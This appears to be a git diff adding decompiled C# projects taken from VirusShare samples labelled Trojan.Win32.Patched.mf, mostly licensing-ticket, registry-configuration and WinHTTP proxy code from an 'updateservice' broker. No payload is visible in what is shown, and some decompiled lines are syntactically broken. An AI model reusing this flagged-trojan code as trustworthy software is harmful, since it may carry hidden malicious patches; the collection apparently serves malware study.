<!--Project was exported from assembly: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Patched.mf-7baf9cb6986a2764176ef57b9ea6985a0cc189acc05703abad9996ef80e59ac1.exe-->
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<ProjectGuid>{2C743BD4-9849-4456-B717-ED010ADD43E4}</ProjectGuid>
<OutputType>Exe</OutputType>
<AssemblyName>MemeoBackgroundService</AssemblyName>
<ApplicationVersion>2.0.0.1</ApplicationVersion>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugSymbols>true</DebugSymbols>
<DebugType>full</DebugType>
<Optimize>false</Optimize>
<OutputPath>bin\Debug\</OutputPath>
<DefineConstants>DEBUG;TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugType>pdbonly</DebugType>
<Optimize>true</Optimize>
<OutputPath>bin\Release\</OutputPath>
<DefineConstants>TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<ItemGroup>
<Reference Include="System" />
<Reference Include="System.Configuration.Install" />
<Reference Include="System.ServiceProcess" />
</ItemGroup>
<ItemGroup>
<Compile Include="RemoteServerService\MemeoBackgroundService.cs" />
<Compile Include="MemeoBackgroundService\ProjectInstaller.cs" />
<Compile Include="AssemblyInfo.cs" />
</ItemGroup>
<ItemGroup>
<EmbeddedResource Include="MemeoBackgroundService\ProjectInstaller.resx" />
<EmbeddedResource Include="RemoteServerService\MemeoBackgroundService.resx" />
</ItemGroup>
<Import Project="$(MSBuildBinPath)\Microsoft.CSharp.targets" />
</Project>
MSIL/Trojan/Win32/P/Trojan.Win32.Patched.mf-7baf9cb6986a2764176ef57b9ea6985a0cc189acc05703abad9996ef80e59ac1/Trojan.Win32.Patched.mf.sln
+20
View File
@@ -0,0 +1,20 @@
Microsoft Visual Studio Solution File, Format Version 9.00
# Visual Studio 2005
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "MemeoBackgroundService", "Trojan.Win32.Patched.mf-7baf9cb6986a2764176ef57b9ea6985a0cc189acc05703abad9996ef80e59ac1.csproj", "{2C743BD4-9849-4456-B717-ED010ADD43E4}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
Release|Any CPU = Release|Any CPU
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{2C743BD4-9849-4456-B717-ED010ADD43E4}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{2C743BD4-9849-4456-B717-ED010ADD43E4}.Debug|Any CPU.Build.0 = Debug|Any CPU
{2C743BD4-9849-4456-B717-ED010ADD43E4}.Release|Any CPU.ActiveCfg = Release|Any CPU
{2C743BD4-9849-4456-B717-ED010ADD43E4}.Release|Any CPU.Build.0 = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal
MSIL/Trojan/Win32/P/Trojan.Win32.Patched.mf-9c4f7eb57e580673b883e57f31931bcbce8bd5d8de1a509a25b8b5a175335d9f/AssemblyInfo.cs
+3
View File
@@ -0,0 +1,3 @@
using System.Reflection;
[assembly: AssemblyVersion("0.0.0.0")]
MSIL/Trojan/Win32/P/Trojan.Win32.Patched.mf-9c4f7eb57e580673b883e57f31931bcbce8bd5d8de1a509a25b8b5a175335d9f/Broker/Activation.cs
+289
View File
@@ -0,0 +1,289 @@
// Decompiled with JetBrains decompiler
// Type: Bmc.Broker.Activation
// Assembly: updateservice, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: A6A1FC23-14F7-4CCE-B702-0F9FFD2CD5AC
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Patched.mf-9c4f7eb57e580673b883e57f31931bcbce8bd5d8de1a509a25b8b5a175335d9f.exe
using Bmc.Broker.Config;
using Bmc.RegistryAccess;
using Bmc.Services.Ticket;
using Net.LShift.SPKI;
using Net.LShift.Utilities;
using System;
using System.Collections;
using System.Collections.Specialized;
using System.Runtime.Remoting.Channels;
using System.Runtime.Remoting.Channels.Tcp;
namespace Bmc.Broker
{
public class Activation
{
public static readonly TimeSpan MAX_TICKET_AGE = TimeSpan.FromMilliseconds(1000.0);
private ITicket _ticketService;
private SPKISexp _ticket = (SPKISexp) null;
private DateTime _ticketTimestamp = DateTime.MinValue;
public static Activation Instance => SingletonFactory.GetInstance(typeof (Activation)) as Activation;
public event SimpleDelegate OnSuccessfulFetch;
private ITicket TicketService
{
get
{
lock (this)
{
if (this._ticketService == null)
{
try
{
ChannelServices.RegisterChannel((IChannel) new TcpChannel());
}
catch (Exception ex)
{
}
string url = "tcp://localhost:" + ConfigurationManager.Instance[(FIELD) 6] + "/" + Constants.URI;
try
{
this._ticketService = (ITicket) Activator.GetObject(typeof (ITicket), url);
}
catch (Exception ex)
{
throw ex;
}
}
return this._ticketService;
}
}
}
public bool TicketOK
{
get
{
try
{
SPKISexp ticket = this.Ticket;
return true;
}
catch (Exception ex)
{
return false;
}
}
}
public bool StateOK
{
get
{
try
{
this.TicketService.GetTime();
return true;
}
catch (Exception ex)
{
return false;
}
}
}
public void FetchTicket()
{
this.TicketService.FetchTicket();
this._ticketTimestamp = DateTime.MinValue;
if (this.OnSuccessfulFetch == null)
return;
this.OnSuccessfulFetch.Invoke();
}
public void WipeState() => this.TicketService.WipeState();
public void RegisterInstance(int port, string auth) => this.TicketService.RegisterInstance(port, auth);
public SPKISexp Ticket
{
get
{
lock (this)
{
try
{
this._ticket = (SPKISexp) null;
this._ticket = this.TicketService.GetTicket();
return this._ticket;
}
finally
{
SPKISexp ticket = this._ticket;
this._ticketTimestamp = DateTime.Now;
}
}
}
}
public SPKISexp LazyTicket
{
get
{
try
{
lock (this)
return DateTime.Now - this._ticketTimestamp > Activation.MAX_TICKET_AGE ? this.Ticket : this._ticket;
}
catch (Exception ex)
{
return (SPKISexp) null;
}
}
}
public TicketState GetState() => Activation.GetState(this.Ticket, this.TicketService.GetTime());
public string Version
{
get
{
SPKISexp lazyTicket = this.LazyTicket;
return lazyTicket != null ? Activation.GetState(lazyTicket, DateTime.Now).GetProperty("bbm", "softwareversion") : (string) null;
}
}
public static TicketState GetState(SPKISexp ticket, DateTime now)
{
try
{
IDictionary states = (IDictionary) new Hashtable();
SPKISexp spkiSexp1 = ticket[nameof (ticket)]["packages"];
for (int index1 = 1; index1 < spkiSexp1.Length; ++index1)
{
SPKISexp spkiSexp2 = spkiSexp1[index1];
if (!spkiSexp2.IsLeaf && spkiSexp2.SexpName == "package")
{
PackageState packageState = new PackageState();
packageState.Permissions = new StringCollection();
packageState.Products = (IDictionary) new Hashtable();
packageState.Package = spkiSexp2.Get("name").Name;
states.Add((object) packageState.Package, (object) packageState);
SPKISexp spkiSexp3 = spkiSexp2["transitions"];
if (spkiSexp3.Length % 2 != 0)
throw new BadTicketException("Odd number of members in transitions");
int num = 2;
while (num < spkiSexp3.Length && !(spkiSexp3[num].ToDateTime() > now))
num += 2;
packageState.CurrentState = spkiSexp3[num - 1].Name;
packageState.LastTransition = num - 2 >= 2 ? spkiSexp3[num - 2].ToDateTime() - now : TimeSpan.MinValue;
if (num + 1 >= spkiSexp3.Length)
{
packageState.NextTransition = TimeSpan.MaxValue;
packageState.NextState = (string) null;
}
else
{
packageState.NextTransition = spkiSexp3[num].ToDateTime() - now;
packageState.NextTransitionDate = spkiSexp3[num].ToDateTime();
packageState.NextState = spkiSexp3[num + 1].Name;
}
SPKISexp spkiSexp4 = spkiSexp2["states"];
SPKISexp spkiSexp5 = (SPKISexp) null;
for (int index2 = 1; index2 < spkiSexp4.Length; ++index2)
{
SPKISexp spkiSexp6 = spkiSexp4[index2];
if (spkiSexp6.SexpName.Equals("state") && spkiSexp6[1].Name.Equals(packageState.CurrentState))
{
spkiSexp5 = spkiSexp6;
break;
}
}
if (spkiSexp5 != null)
{
try
{
SPKISexp spkiSexp7 = spkiSexp5["permissions"];
for (int index3 = 1; index3 < spkiSexp7.Length; ++index3)
packageState.Permissions.Add(spkiSexp7[index3].Name);
}
catch (AccessException ex)
{
}
try
{
SPKISexp spkiSexp8 = spkiSexp5["products"];
for (int index4 = 1; index4 < spkiSexp8.Length; ++index4)
{
SPKISexp spkiSexp9 = spkiSexp8[index4];
if (!spkiSexp9.IsLeaf)
{
if (spkiSexp9.SexpName == "product")
{
try
{
string name1 = spkiSexp9[1].Name;
ProductState productState = new ProductState();
productState.Product = name1;
packageState.Products[(object) name1] = (object) productState;
productState.Properties = (IDictionary) new Hashtable();
productState.Permissions = new StringCollection();
SPKISexp spkiSexp10 = spkiSexp9["properties"];
for (int index5 = 1; index5 < spkiSexp10.Length; ++index5)
{
SPKISexp spkiSexp11 = spkiSexp10[index5];
if (!spkiSexp11.IsLeaf && spkiSexp11.SexpName == "property")
{
string name2 = spkiSexp11[1].Name;
string name3 = spkiSexp11[2].Name;
productState.Properties[(object) name2] = (object) name3;
}
}
SPKISexp spkiSexp12 = spkiSexp9["permissions"];
for (int index6 = 1; index6 < spkiSexp12.Length; ++index6)
productState.Permissions.Add(spkiSexp12[index6].Name);
}
catch (AccessException ex)
{
}
}
}
}
}
catch (AccessException ex)
{
}
}
}
}
return new TicketState(states);
}
catch (AccessException ex)
{
throw new BadTicketException("missing fields", (Exception) ex);
}
}
public void CheckForPermission(string product, string permission)
{
if (!this.GetState().HasPermission(product, permission))
throw new PermissionDeniedException();
}
public bool GetPermission(string product, string permission)
{
try
{
return this.GetState().HasPermission(product, permission);
}
catch (NoTicketException ex)
{
return false;
}
catch (Exception ex)
{
return false;
}
}
public string GetProperty(string prodId, string propName) => this.GetState().GetProperty(prodId, propName);
}
}
MSIL/Trojan/Win32/P/Trojan.Win32.Patched.mf-9c4f7eb57e580673b883e57f31931bcbce8bd5d8de1a509a25b8b5a175335d9f/Broker/Config/ConfigurationManager.cs
+142
View File
@@ -0,0 +1,142 @@
// Decompiled with JetBrains decompiler
// Type: Bmc.Broker.Config.ConfigurationManager
// Assembly: updateservice, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: A6A1FC23-14F7-4CCE-B702-0F9FFD2CD5AC
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Patched.mf-9c4f7eb57e580673b883e57f31931bcbce8bd5d8de1a509a25b8b5a175335d9f.exe
using Bmc.RegistryAccess;
using Microsoft.Win32;
using Net.LShift.Utilities;
using System;
using System.IO;
using System.Xml;
namespace Bmc.Broker.Config
{
public class ConfigurationManager
{
public static ConfigurationManager Instance => SingletonFactory.GetInstance(typeof (ConfigurationManager)) as ConfigurationManager;
public string this[FIELD f]
{
get => RegistryFields.Instance[f];
set => RegistryFields.Instance[f] = value;
}
public Uri ProtocolUri => new Uri(this[(FIELD) 1]);
public Uri MessagingUri => new Uri(this[(FIELD) 2]);
public Uri ProtocolRelUri(string path) => new Uri(this.ProtocolUri, path);
public Uri MessagingRelUri(string path) => new Uri(this.MessagingUri, path);
public bool IsProductAvailable(string prodId)
{
string path = this.ProductExePath(prodId);
return path != null && File.Exists(path);
}
private string GetProductValue(string prodId, string valueName)
{
RegistryKey registryKey1 = Registry.LocalMachine.OpenSubKey(BuildVersion.ProductRegistryKey).OpenSubKey("Products");
if (registryKey1 != null)
{
try
{
RegistryKey registryKey2 = registryKey1.OpenSubKey(prodId);
if (registryKey2 != null)
{
try
{
return (string) registryKey2.GetValue(valueName);
}
finally
{
registryKey2.Close();
}
}
}
finally
{
registryKey1.Close();
}
}
return (string) null;
}
public string ProductExePath(string prodId) => this.GetProductValue(prodId, "ExePath");
public bool RegistryIsSane
{
get
{
try
{
Uri protocolUri = this.ProtocolUri;
Uri messagingUri = this.MessagingUri;
return Directory.Exists(this[(FIELD) 3]);
}
catch (Exception ex)
{
return false;
}
}
}
public XmlDocument Xml
{
get
{
XmlDocument xml = new XmlDocument();
xml.LoadXml("<state/>");
foreach (FIELD field in Enum.GetValues(typeof (FIELD)))
{
FIELD f = (FIELD) ^(int&) ref field;
XmlElement element = xml.CreateElement("field");
xml.DocumentElement.AppendChild((XmlNode) element);
try
{
element.InnerText = this[f];
}
catch (Exception ex)
{
element = xml.CreateElement("exception");
element.InnerText = ex.ToString();
xml.DocumentElement.AppendChild((XmlNode) element);
}
element.SetAttribute("name", ((Enum) (object) f).ToString());
}
return xml;
}
}
public void WipeState()
{
FIELD[] fieldArray = new FIELD[7]
{
(FIELD) 5,
(FIELD) 8,
(FIELD) 9,
(FIELD) 10,
(FIELD) 11,
(FIELD) 13,
(FIELD) 14
};
foreach (int num in fieldArray)
{
FIELD field = (FIELD) num;
RegistryKey registryKey = RegistryFields.ConfigKey(field, true);
try
{
registryKey.DeleteValue(((Enum) (object) field).ToString(), false);
}
finally
{
registryKey.Flush();
registryKey.Close();
}
}
}
}
}
MSIL/Trojan/Win32/P/Trojan.Win32.Patched.mf-9c4f7eb57e580673b883e57f31931bcbce8bd5d8de1a509a25b8b5a175335d9f/Broker/PackageState.cs
+28
View File
@@ -0,0 +1,28 @@
// Decompiled with JetBrains decompiler
// Type: Bmc.Broker.PackageState
// Assembly: updateservice, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: A6A1FC23-14F7-4CCE-B702-0F9FFD2CD5AC
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Patched.mf-9c4f7eb57e580673b883e57f31931bcbce8bd5d8de1a509a25b8b5a175335d9f.exe
using System;
using System.Collections;
using System.Collections.Specialized;
namespace Bmc.Broker
{
public class PackageState
{
public string Package;
public TimeSpan LastTransition;
public string CurrentState;
public TimeSpan NextTransition;
public DateTime NextTransitionDate;
public string NextState;
public StringCollection Permissions;
public IDictionary Products;
public bool HasPermission(string productName, string perm) => productName != null && this.Products.Contains((object) productName) && ((ProductState) this.Products[(object) productName]).Permissions.Contains(perm) || this.Permissions.Contains(perm);
public string GetProperty(string productName, string propName) => !this.Products.Contains((object) productName) ? (string) null : ((ProductState) this.Products[(object) productName]).GetProperty(propName);
}
}
MSIL/Trojan/Win32/P/Trojan.Win32.Patched.mf-9c4f7eb57e580673b883e57f31931bcbce8bd5d8de1a509a25b8b5a175335d9f/Broker/ProductState.cs
+20
View File
@@ -0,0 +1,20 @@
// Decompiled with JetBrains decompiler
// Type: Bmc.Broker.ProductState
// Assembly: updateservice, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: A6A1FC23-14F7-4CCE-B702-0F9FFD2CD5AC
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Patched.mf-9c4f7eb57e580673b883e57f31931bcbce8bd5d8de1a509a25b8b5a175335d9f.exe
using System.Collections;
using System.Collections.Specialized;
namespace Bmc.Broker
{
public class ProductState
{
public string Product;
public IDictionary Properties;
public StringCollection Permissions;
public string GetProperty(string propName) => !this.Properties.Contains((object) propName) ? (string) null : (string) this.Properties[(object) propName];
}
}
MSIL/Trojan/Win32/P/Trojan.Win32.Patched.mf-9c4f7eb57e580673b883e57f31931bcbce8bd5d8de1a509a25b8b5a175335d9f/Broker/Proxy/ProxyComponent.cs
+120
View File
@@ -0,0 +1,120 @@
// Decompiled with JetBrains decompiler
// Type: Bmc.Broker.Proxy.ProxyComponent
// Assembly: updateservice, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: A6A1FC23-14F7-4CCE-B702-0F9FFD2CD5AC
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Patched.mf-9c4f7eb57e580673b883e57f31931bcbce8bd5d8de1a509a25b8b5a175335d9f.exe
using Bmc.Broker.Config;
using Bmc.RegistryAccess;
using Microsoft.Win32;
using Net.LShift.Utilities;
using System;
using System.Net;
using System.Runtime.InteropServices;
namespace Bmc.Broker.Proxy
{
public class ProxyComponent
{
public const int WINHTTP_ACCESS_TYPE_DEFAULT_PROXY = 0;
public const int WINHTTP_ACCESS_TYPE_NO_PROXY = 1;
public const int WINHTTP_ACCESS_TYPE_NAMED_PROXY = 3;
private const int WINHTTP_AUTOPROXY_AUTO_DETECT = 1;
private const int WINHTTP_AUTOPROXY_CONFIG_URL = 2;
private const int WINHTTP_AUTOPROXY_RUN_INPROCESS = 65536;
private const int WINHTTP_AUTOPROXY_RUN_OUTPROCESS_ONLY = 131072;
private const int WINHTTP_AUTO_DETECT_TYPE_DHCP = 1;
private const int WINHTTP_AUTO_DETECT_TYPE_DNS_A = 2;
private static readonly IntPtr WINHTTP_NO_PROXY_NAME = IntPtr.Zero;
private static readonly IntPtr WINHTTP_NO_PROXY_BYPASS = IntPtr.Zero;
[DllImport("winhttp.dll", CharSet = CharSet.Unicode, SetLastError = true)]
private static extern IntPtr WinHttpOpen(
string pwszUserAgent,
int dwAccessType,
IntPtr pwszProxyName,
IntPtr pwszProxyBypass,
int dwFlags);
[DllImport("winhttp.dll", CharSet = CharSet.Unicode, SetLastError = true)]
private static extern bool WinHttpCloseHandle(IntPtr hInternet);
[DllImport("winhttp.dll", CharSet = CharSet.Unicode, SetLastError = true)]
private static extern bool WinHttpGetProxyForUrl(
IntPtr hSession,
string lpcwszUrl,
ref WINHTTP_AUTOPROXY_OPTIONS pAutoProxyOptions,
ref WINHTTP_PROXY_INFO pProxyInfo);
[DllImport("winhttp.dll", CharSet = CharSet.Unicode, SetLastError = true)]
private static extern bool WinHttpGetIEProxyConfigForCurrentUser(
ref WINHTTP_CURRENT_USER_IE_PROXY_CONFIG pProxyConfig);
public static ProxyComponent Instance => SingletonFactory.GetInstance(typeof (ProxyComponent)) as ProxyComponent;
public void SetupForProxy(WebRequest request)
{
IWebProxy proxy = this.GetProxy(request);
if (proxy == null)
return;
proxy.Credentials = (ICredentials) this.ProxyCredential;
request.Proxy = proxy;
}
private IWebProxy GetProxy(WebRequest request)
{
ProxyInfo proxy = (ProxyInfo) null;
try
{
if (this.GetProxyAutoDetect())
proxy = ProxyComponent.GetDynamicProxyForUrl(request.RequestUri.ToString());
}
catch (Exception ex)
{
proxy = (ProxyInfo) null;
}
if (proxy != null)
return (IWebProxy) proxy;
return this.GetProxyEnable() ? (IWebProxy) WebProxy.GetDefaultProxy() : (IWebProxy) null;
}
public NetworkCredential ProxyCredential => this.ProxyUserName == "" && this.ProxyPassword == "" ? (NetworkCredential) null : new NetworkCredential(this.ProxyUserName, this.ProxyPassword);
private bool GetProxyAutoDetect()
{
WINHTTP_CURRENT_USER_IE_PROXY_CONFIG pProxyConfig = new WINHTTP_CURRENT_USER_IE_PROXY_CONFIG();
ProxyComponent.WinHttpGetIEProxyConfigForCurrentUser(ref pProxyConfig);
return pProxyConfig.fAutoDetect;
}
private bool GetProxyEnable() => (int) Registry.CurrentUser.OpenSubKey("Software\\Microsoft\\Windows\\CurrentVersion\\Internet settings", false).GetValue("ProxyEnable") != 0;
private string ProxyUserName => ConfigurationManager.Instance[(FIELD) 13];
private string ProxyPassword => ConfigurationManager.Instance[(FIELD) 14];
public static ProxyInfo GetDynamicProxyForUrl(string addressUrl)
{
IntPtr num = ProxyComponent.WinHttpOpen(BuildVersion.ProductTitle, 0, ProxyComponent.WINHTTP_NO_PROXY_NAME, ProxyComponent.WINHTTP_NO_PROXY_BYPASS, 0);
if (num == IntPtr.Zero)
return (ProxyInfo) null;
try
{
WINHTTP_AUTOPROXY_OPTIONS pAutoProxyOptions = new WINHTTP_AUTOPROXY_OPTIONS();
pAutoProxyOptions.dwFlags = 1;
pAutoProxyOptions.dwAutoDetectFlags = 3;
pAutoProxyOptions.fAutoLoginIfChallenged = true;
WINHTTP_PROXY_INFO pProxyInfo = new WINHTTP_PROXY_INFO();
if (!ProxyComponent.WinHttpGetProxyForUrl(num, addressUrl, ref pAutoProxyOptions, ref pProxyInfo))
return (ProxyInfo) null;
ProxyInfo dynamicProxyForUrl = new ProxyInfo();
dynamicProxyForUrl.LoadFrom(pProxyInfo);
return dynamicProxyForUrl;
}
finally
{
ProxyComponent.WinHttpCloseHandle(num);
}
}
}
}
MSIL/Trojan/Win32/P/Trojan.Win32.Patched.mf-9c4f7eb57e580673b883e57f31931bcbce8bd5d8de1a509a25b8b5a175335d9f/Broker/Proxy/ProxyInfo.cs
+110
View File
@@ -0,0 +1,110 @@
// Decompiled with JetBrains decompiler
// Type: Bmc.Broker.Proxy.ProxyInfo
// Assembly: updateservice, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: A6A1FC23-14F7-4CCE-B702-0F9FFD2CD5AC
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Patched.mf-9c4f7eb57e580673b883e57f31931bcbce8bd5d8de1a509a25b8b5a175335d9f.exe
using System;
using System.Collections;
using System.Net;
using System.Text.RegularExpressions;
namespace Bmc.Broker.Proxy
{
public class ProxyInfo : IWebProxy
{
public static readonly Regex schematizedProxyRegex = new Regex("^([a-zA-Z]+)=(.*)");
public static readonly Regex hostAndPortRegex = new Regex("^[a-zA-Z0-9.]+:[0-9]+");
private static readonly char[] splitChars = new char[5]
{
' ',
';',
'\n',
'\r',
'\t'
};
private ICredentials creds;
public bool useProxy;
public Hashtable proxies;
public Uri defaultProxy;
public string[] bypassDomains;
public bool bypassLocal;
public ProxyInfo()
{
this.creds = (ICredentials) null;
this.useProxy = false;
this.proxies = new Hashtable();
this.defaultProxy = (Uri) null;
this.bypassDomains = new string[0];
this.bypassLocal = true;
}
private Uri UriFrom(string str) => str.IndexOf(':') == -1 || ProxyInfo.hostAndPortRegex.Match(str).Success ? new Uri("http://" + str) : new Uri(str);
public void LoadFrom(WINHTTP_PROXY_INFO wpi)
{
if (wpi.dwAccessType == 1)
{
this.useProxy = false;
}
else
{
this.useProxy = true;
foreach (string str in wpi.lpszProxy == null ? new string[0] : wpi.lpszProxy.Split(ProxyInfo.splitChars))
{
Match match = ProxyInfo.schematizedProxyRegex.Match(str);
if (match.Success)
this.proxies[(object) match.Groups[1].ToString()] = (object) this.UriFrom(match.Groups[2].ToString());
else
this.defaultProxy = this.UriFrom(str);
}
this.bypassDomains = wpi.lpszProxyBypass == null ? new string[0] : wpi.lpszProxyBypass.Split(ProxyInfo.splitChars);
this.bypassLocal = false;
foreach (string bypassDomain in this.bypassDomains)
{
if (bypassDomain == "<local>")
{
this.bypassLocal = true;
break;
}
}
if (!this.bypassLocal)
return;
string[] strArray = new string[this.bypassDomains.Length - 1];
int num = 0;
foreach (string bypassDomain in this.bypassDomains)
{
if (bypassDomain != "<local>")
strArray[num++] = bypassDomain;
}
this.bypassDomains = strArray;
}
}
public ICredentials Credentials
{
get => this.creds;
set => this.creds = value;
}
public Uri GetProxy(Uri dest)
{
if (!this.useProxy)
return (Uri) null;
return this.proxies.ContainsKey((object) dest.Scheme) ? (Uri) this.proxies[(object) dest.Scheme] : this.defaultProxy;
}
public bool IsBypassed(Uri dest)
{
if (!this.useProxy || this.bypassLocal && (dest.IsLoopback || dest.Host.IndexOf('.') == -1))
return true;
foreach (string bypassDomain in this.bypassDomains)
{
if (bypassDomain == dest.Host)
return true;
}
return false;
}
}
}
MSIL/Trojan/Win32/P/Trojan.Win32.Patched.mf-9c4f7eb57e580673b883e57f31931bcbce8bd5d8de1a509a25b8b5a175335d9f/Broker/Proxy/WINHTTP_AUTOPROXY_OPTIONS.cs
+25
View File
@@ -0,0 +1,25 @@
// Decompiled with JetBrains decompiler
// Type: Bmc.Broker.Proxy.WINHTTP_AUTOPROXY_OPTIONS
// Assembly: updateservice, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: A6A1FC23-14F7-4CCE-B702-0F9FFD2CD5AC
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Patched.mf-9c4f7eb57e580673b883e57f31931bcbce8bd5d8de1a509a25b8b5a175335d9f.exe
using System;
using System.Runtime.InteropServices;
namespace Bmc.Broker.Proxy
{
[StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
public struct WINHTTP_AUTOPROXY_OPTIONS
{
[MarshalAs(UnmanagedType.U4)]
public int dwFlags;
[MarshalAs(UnmanagedType.U4)]
public int dwAutoDetectFlags;
public string lpszAutoConfigUrl;
public IntPtr lpvReserved;
[MarshalAs(UnmanagedType.U4)]
public int dwReserved;
public bool fAutoLoginIfChallenged;
}
}
MSIL/Trojan/Win32/P/Trojan.Win32.Patched.mf-9c4f7eb57e580673b883e57f31931bcbce8bd5d8de1a509a25b8b5a175335d9f/Broker/Proxy/WINHTTP_CURRENT_USER_IE_PROXY_CONFIG.cs
+19
View File
@@ -0,0 +1,19 @@
// Decompiled with JetBrains decompiler
// Type: Bmc.Broker.Proxy.WINHTTP_CURRENT_USER_IE_PROXY_CONFIG
// Assembly: updateservice, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: A6A1FC23-14F7-4CCE-B702-0F9FFD2CD5AC
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Patched.mf-9c4f7eb57e580673b883e57f31931bcbce8bd5d8de1a509a25b8b5a175335d9f.exe
using System.Runtime.InteropServices;
namespace Bmc.Broker.Proxy
{
[StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
public struct WINHTTP_CURRENT_USER_IE_PROXY_CONFIG
{
public bool fAutoDetect;
public string lpszautoConfigUrl;
public string lpszProxy;
public string lpszProxyBypass;
}
}
MSIL/Trojan/Win32/P/Trojan.Win32.Patched.mf-9c4f7eb57e580673b883e57f31931bcbce8bd5d8de1a509a25b8b5a175335d9f/Broker/Proxy/WINHTTP_PROXY_INFO.cs
+19
View File
@@ -0,0 +1,19 @@
// Decompiled with JetBrains decompiler
// Type: Bmc.Broker.Proxy.WINHTTP_PROXY_INFO
// Assembly: updateservice, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: A6A1FC23-14F7-4CCE-B702-0F9FFD2CD5AC
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Patched.mf-9c4f7eb57e580673b883e57f31931bcbce8bd5d8de1a509a25b8b5a175335d9f.exe
using System.Runtime.InteropServices;
namespace Bmc.Broker.Proxy
{
[StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
public struct WINHTTP_PROXY_INFO
{
[MarshalAs(UnmanagedType.U4)]
public int dwAccessType;
public string lpszProxy;
public string lpszProxyBypass;
}
}
MSIL/Trojan/Win32/P/Trojan.Win32.Patched.mf-9c4f7eb57e580673b883e57f31931bcbce8bd5d8de1a509a25b8b5a175335d9f/Broker/ResourceSystem/DebugManager.cs
+19
View File
@@ -0,0 +1,19 @@
// Decompiled with JetBrains decompiler
// Type: Bmc.Broker.ResourceSystem.DebugManager
// Assembly: updateservice, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: A6A1FC23-14F7-4CCE-B702-0F9FFD2CD5AC
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Patched.mf-9c4f7eb57e580673b883e57f31931bcbce8bd5d8de1a509a25b8b5a175335d9f.exe
namespace Bmc.Broker.ResourceSystem
{
public class DebugManager
{
public static void Init(ResourceManager resourceManager)
{
}
public static void Shutdown()
{
}
}
}

Some files were not shown because too many files have changed in this diff Show More